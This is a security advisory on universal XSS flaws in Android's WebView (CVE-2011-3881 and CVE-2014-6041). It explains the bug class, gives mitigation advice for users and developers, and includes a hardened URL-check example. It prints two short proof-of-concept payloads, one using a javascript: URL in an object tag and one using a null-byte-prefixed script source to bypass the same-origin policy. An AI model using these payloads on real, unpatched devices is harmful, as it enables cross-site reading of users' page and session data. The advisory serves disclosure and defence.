Android security: WebView UXSS vulnerability warning

ID MYHACK58:62201678636
Type myhack58
Reporter 御安全
Modified 2016-09-02T00:00:00


0X01 Introduction

XSS is an attack we are all familiar with, and it includes stored XSS, reflected XSS, DOM XSS and so on. UXSS (universal XSS) is a different class of vulnerability, and the difference lies mainly in where the vulnerability resides and in its scope of impact.

Ordinary XSS stems from a security issue in a particular website or application. Because of the same-origin policy, the attacker can only read the response data of the vulnerable site itself, not the response data of other domains.

UXSS is caused by security flaws in the browser itself or in browser extensions. The website does not need to have any vulnerability of its own for the bug to be triggered, and an attacker can read the pages and session information the browser has opened or cached for every domain, which is why a UXSS vulnerability is so damaging.

When Google ported WebKit to Android and packaged it in the SDK as the WebView component, some WebKit vulnerabilities that had already appeared in the PC version of Chrome were not fixed in the SDK, so the tragedy of history played out once again on Android:


Related vulnerabilities can be searched at https://bugs.chromium.org/p/chromium/issues/list. A few of the corresponding vulnerabilities are described below.

0X02 CVE-2011-3881

WebKit, as used in Google Chrome before 15.0.874.102 and Android before 4.4, allows remote attackers to bypass the Same Origin Policy and conduct Universal XSS (UXSS) attacks via vectors related to

(1) the DOMWindow::clear function and use of a selection object,

(2) the Object::GetRealNamedPropertyInPrototypeChain function and use of an __proto__ property,

(3) the HTMLPlugInImageElement::allowedToLoadFrameURL function and use of a javascript: URL,

(4) incorrect origins for XSLT-generated documents in the XSLTProcessor::createDocumentFromSource function, and

(5) improper handling of synchronous frame loads in the ScriptController::executeIfJavaScriptURL function.

The vulnerability is mainly due to insufficient checking of javascript: URLs in the HTMLPlugInImageElement::allowedToLoadFrameURL function: the origin check is incomplete, which is what causes the cross-domain problem.

POC:

<script>window.onload = function(){
  object = document.createElement("object");
  object.data = "";
  document.body.appendChild(object);
  object.onload = function() {
    object.data = "javascript:alert(document.body.innerHTML)";
    object.innerHTML = "foo";
  };
}</script>



0X03 CVE-2014-6041

The Android WebView in Android before 4.4 allows remote attackers to bypass the Same Origin Policy via a crafted attribute containing a \u0000 character, as demonstrated by an onclick="window.open('\u0000javascript: sequence to the Android Browser application 4.2.1 or a third-party web browser.

Because many vendors use the system's own WebView directly, the impact of this vulnerability is magnified further, and many mainstream applications were hit.

POC:

<input type=button value="test" onclick="
  a=document.createElement('script');
  a.id='AA';
  a.src='\u0000https://js.stripe.com/v2/';
  document.body.appendChild(a);
  setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}
  else{alert(2);}},400);
  return false;">

0X04 Detection

Vulnerabilities of this kind can be detected automatically with 御安全's dynamic detection; the detection samples can be taken from https://bugs.chromium.org/p/chromium/issues/detail?id=xxx (query by bug id).

0X05 Security recommendations

The UXSS vulnerabilities mentioned above have already been fixed in Android 4.4, which also provides an automatic WebKit upgrade function so that vulnerabilities can be repaired in a timely manner.

For users:

1) Try to use the latest version of the Android system

2) Do not casually click links of unknown safety

For developers (client side):

1) In the client, use the onPageStarted(WebView view, String url, Bitmap favicon) method to perform a cross-domain determination before the navigation happens

2) Ship the latest WebKit core; this makes the APK larger, however, and the app must subsequently keep up with Google's official WebKit updates.

3) In the client, filter the attributes of iframe and object tags

4) Regularly check with vulnerability tools; for example, the 御安全 vulnerability database is updated in sync with samples from the app market
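The cross-domain determination in item 1) and the attribute filtering in item 3) both come down to the same decision: given a URL string taken from a navigation or from a tag attribute, is the load same-origin and is the scheme safe? The JavaScript below is an added example, not code from the original article or from 御安全. It contrasts a naive prefix check, which is a simplified model of the bug class and not WebKit's actual code, with an origin-based check that rejects control characters and non-http(s) schemes, and runs both over the two PoC vectors above plus a few benign URLs. The page URL, the allow-list and the sample URLs are assumed values.

```javascript
// Added example (not from the original article): two URL checks a WebView host
// could apply before allowing a load, e.g. from onPageStarted or
// shouldOverrideUrlLoading. The naive one models the bug class; the hardened
// one normalises first and compares parsed origins.

const PAGE_URL = "https://app.example.com/index.html";   // assumed host page
const ALLOWED_ORIGINS = ["https://app.example.com"];    // assumed allow-list

// Flawed check (simplified model, not WebKit's real logic): anything that does
// not look like an absolute http(s) URL is assumed to be a relative, same-origin
// reference and is allowed. "\u0000https://..." and "javascript:..." both pass.
function naiveIsAllowed(rawUrl) {
  if (!/^https?:\/\//i.test(rawUrl)) {
    return true; // treated as relative -> assumed same origin
  }
  return ALLOWED_ORIGINS.some((origin) => rawUrl.startsWith(origin + "/"));
}

// Hardened check: reject control characters outright, resolve the URL against
// the page URL with a real parser, allow only http(s), then compare the origin.
function hardenedCheck(rawUrl, pageUrl = PAGE_URL, allowed = ALLOWED_ORIGINS) {
  // C0 control characters (\u0000, \t, \n, ...) and DEL never belong in a URL.
  if (/[\u0000-\u001F\u007F]/.test(rawUrl)) {
    return { allowed: false, reason: "control characters in URL" };
  }
  let parsed;
  try {
    parsed = new URL(rawUrl.trim(), pageUrl); // resolves relative references
  } catch (e) {
    return { allowed: false, reason: "unparseable URL" };
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
    return { allowed: false, reason: `scheme ${parsed.protocol} not allowed` };
  }
  if (!allowed.includes(parsed.origin)) {
    return { allowed: false, reason: `origin ${parsed.origin} not on allow-list` };
  }
  return { allowed: true, reason: `same-origin load of ${parsed.href}` };
}

// Constructed sample inputs: the two PoC vectors from the article plus benign URLs.
const SAMPLE_URLS = [
  "\u0000https://js.stripe.com/v2/",            // CVE-2014-6041 vector
  "javascript:alert(document.body.innerHTML)", // CVE-2011-3881 vector
  "/static/app.js",                            // genuine relative URL
  "https://app.example.com/api/data",          // same origin, absolute
  "https://js.stripe.com/v2/",                 // plain cross-origin URL
];

// Runs both checks over a list of URLs and returns one row per URL.
function compareChecks(urls = SAMPLE_URLS) {
  return urls.map((u) => {
    const verdict = hardenedCheck(u);
    return {
      url: JSON.stringify(u),
      naive: naiveIsAllowed(u),
      hardened: verdict.allowed,
      reason: verdict.reason,
    };
  });
}

console.table(compareChecks());
```

The table shows the naive check allowing both PoC vectors while the hardened check rejects them with an explicit reason, and the benign relative and same-origin URLs pass both. Rejecting control characters outright, rather than stripping them and continuing, is deliberate: a URL containing \u0000 is never legitimate, and refusing it is cheaper and easier to log than reasoning about how each parser in the stack will treat it.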

0X06 Reference